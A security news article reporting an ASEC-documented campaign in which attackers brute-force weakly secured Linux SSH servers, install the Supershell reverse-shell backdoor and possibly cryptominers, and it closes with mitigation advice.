Wednesday, January 15, 2025
HomeBackdoorHackers Using Supershell Malware To Attack Linux SSH Servers

Hackers Using Supershell Malware To Attack Linux SSH Servers

Published on

Researchers identified an attack campaign targeting poorly secured Linux SSH servers, where the attack leverages Supershell, a cross-platform reverse shell backdoor written in Go, granting attackers remote control of compromised systems. 

Following the initial infection, attackers are suspected to have deployed scanners to identify additional vulnerable targets and then likely launched dictionary attacks on these targets using credentials harvested from the compromised systems.  

 GitHub page of Supershell

The data reveals a list of threat actor IP addresses and their corresponding root credentials, including common passwords like “root/password” and “root/123456789,” which are frequently exploited by attackers to gain unauthorized access to vulnerable systems.

Meet the CISOs, Join the Virtual Panel to Learn compliance – Join for free 

The presence of these credentials on compromised devices indicates a significant security risk, as they can be used to execute malicious activities, steal sensitive information, and disrupt operations. 

The identification and mitigation of these vulnerabilities are crucial to protecting systems from potential threats.

The threat actor used various methods to download and execute malicious scripts after compromising a system. 

An attacker leveraged wget, curl, tftp, and ftpget commands to download scripts from different sources, including web servers, FTP servers, and even non-standard ports. 

Obfuscated Supershell

The downloaded scripts were then executed using shell commands (sh, bash), granting the attacker remote access and potentially installing additional malware, and then attackers attempted to remove traces of the attack by deleting the downloaded scripts and other files.  

An attacker initially installed the obfuscated Supershell backdoor on a poorly managed Linux system, which, as identified by its internal strings, behavior, and execution logs, provides the attacker with remote control capabilities. 

While the primary goal seems to be control hijacking, there’s a possibility that the attacker also intends to install a cryptocurrency miner, like XMRig, to exploit the system’s resources for personal gain, which aligns with common attack patterns targeting vulnerable Linux systems.

Log showing Supershell’s execution

Threat actors are exploiting poorly managed Linux SSH servers by installing the Supershell backdoor, which enables remote control of infected systems, potentially leading to data theft, system compromise, and other malicious activities. 

According to ASEC, to mitigate this threat, administrators should prioritize strong password hygiene, regular updates, and robust security measures like firewalls. 

Additionally, ensuring that V3 is up-to-date is crucial to prevent malware infections. By implementing these countermeasures, organizations can significantly reduce their vulnerability to Supershell attacks.

The detected malware includes a Cobalt Strike backdoor, a shell agent downloader, and an ElfMiner downloader, which was identified as Backdoor/Linux.CobaltStrike.3753120 was likely deployed for remote access and control. 

The shell agent downloader, Downloader/Shell.Agent.SC203780, was designed to download and execute additional malicious payloads.

The ElfMiner downloader, Downloader/Shell.ElfMiner.S1705, was likely used to download and install cryptocurrency mining malware.

Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14-day free trial

Varshini
Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Latest articles

Aembit Announces Speaker Lineup for the Inaugural NHIcon

Aembit, the non-human identity and access management (IAM) company, unveiled the full agenda for...

Sweet Security Introduces Patent-Pending LLM-Powered Detection Engine, Reducing Cloud Detection Noise to 0.04%

Sweet Security, a leader in cloud runtime detection and response, today announced the launch...

ShadowSyndicate Hackers Added RansomHub Ransomware to their Arsenal

ShadowSyndicate is a prolific threat actor that has been active since July 2022, collaborated...

5,000 WordPress Sites Hacked in New WP3.XYZ Malware Attack

Widespread malware campaigns detected by side crawlers exploit vulnerabilities on multiple websites where the...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

5,000 WordPress Sites Hacked in New WP3.XYZ Malware Attack

Widespread malware campaigns detected by side crawlers exploit vulnerabilities on multiple websites where the...

QSC: Multi-Plugin Malware Framework Installs Backdoor on Windows

The QSC Loader service DLL named "loader.dll" leverages two distinct methods to obtain the...

Weaponized LDAP Exploit Deploys Information-Stealing Malware

Cybercriminals are exploiting the recent critical LDAP vulnerabilities (CVE-2024-49112 and CVE-2024-49113) by distributing fake...